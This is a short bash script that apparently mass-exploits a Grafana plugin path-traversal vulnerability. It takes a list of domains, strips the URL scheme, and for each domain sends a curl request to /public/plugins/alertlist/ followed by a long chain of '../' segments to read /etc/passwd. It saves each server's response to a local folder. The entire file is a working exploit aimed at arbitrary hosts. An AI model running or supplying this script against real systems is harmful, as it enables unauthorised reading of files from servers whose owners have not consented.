#!/bin/bash

list=$1

cat $list | sed 's/^http\(\|s\):\/\///g' | tee ~/all_list.txt

for domain in $(cat ~/all_list.txt);do

mkdir -p ~/grafana_cve/
dir=~/grafana_cve/

curl --path-as-is -k -D- "https://$domain/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd" | tee $dir/$domain

done
